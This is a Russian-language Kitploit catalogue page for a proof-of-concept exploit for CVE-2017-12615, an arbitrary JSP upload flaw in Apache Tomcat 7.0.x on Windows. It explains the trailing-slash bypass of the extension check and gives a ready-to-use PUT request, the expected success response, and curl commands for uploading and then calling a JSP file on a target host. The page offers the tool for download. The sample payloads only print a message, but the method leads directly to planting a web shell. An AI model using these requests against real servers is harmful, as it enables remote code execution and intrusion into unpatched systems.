Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-12615 — PoC-эксплойт для уязвимости PUT JSP в Apache Tomcat 7.0.x (CVE-2017-12615). | Kitploit
Инструменты/GitHubGitHub/breaktoprotect/cve-2017-12615
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

PoC-эксплойт для уязвимости PUT JSP в Apache Tomcat 7.0.x (CVE-2017-12615).

Репозиторий
112213 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

В память о Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC-эксплойт для Apache Tomcat 7.0.0–7.0.79 под управлением Windows; уязвимость CVE-2017-12615 PUT JSP.

Описание:

По замыслу, на серверах Apache Tomcat не разрешена загрузка JSP-файлов через метод PUT. Вероятно, это мера безопасности, призванная не дать атакующему загрузить JSP-шелл и получить удалённое выполнение кода на сервере. Однако из-за недостаточных проверок атакующий может получить удалённое выполнение кода на серверах Tomcat 7.0.{0 to 79}, где включён PUT, отправив на сервер Tomcat специально сформированный HTTP-запрос с методом PUT. Но серьёзно, особый? Ну пожалуйста.

Метод эксплуатации:

Добавив символ '/' после расширения имени файла, можно обойти проверку расширения файла. Вот и всё. Так что на самом деле ничего особенного.

Эксплойт через метод запроса:

Запрос

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Ожидаемый ответ при успехе

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Эксплойт с помощью 'curl':

  1. Создайте .jsp-файл (например, test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Выполните команду curl на целевом сервере:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Проверьте, загрузился ли ваш файл, открыв целевой адрес в браузере, или:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
Скачать инструмент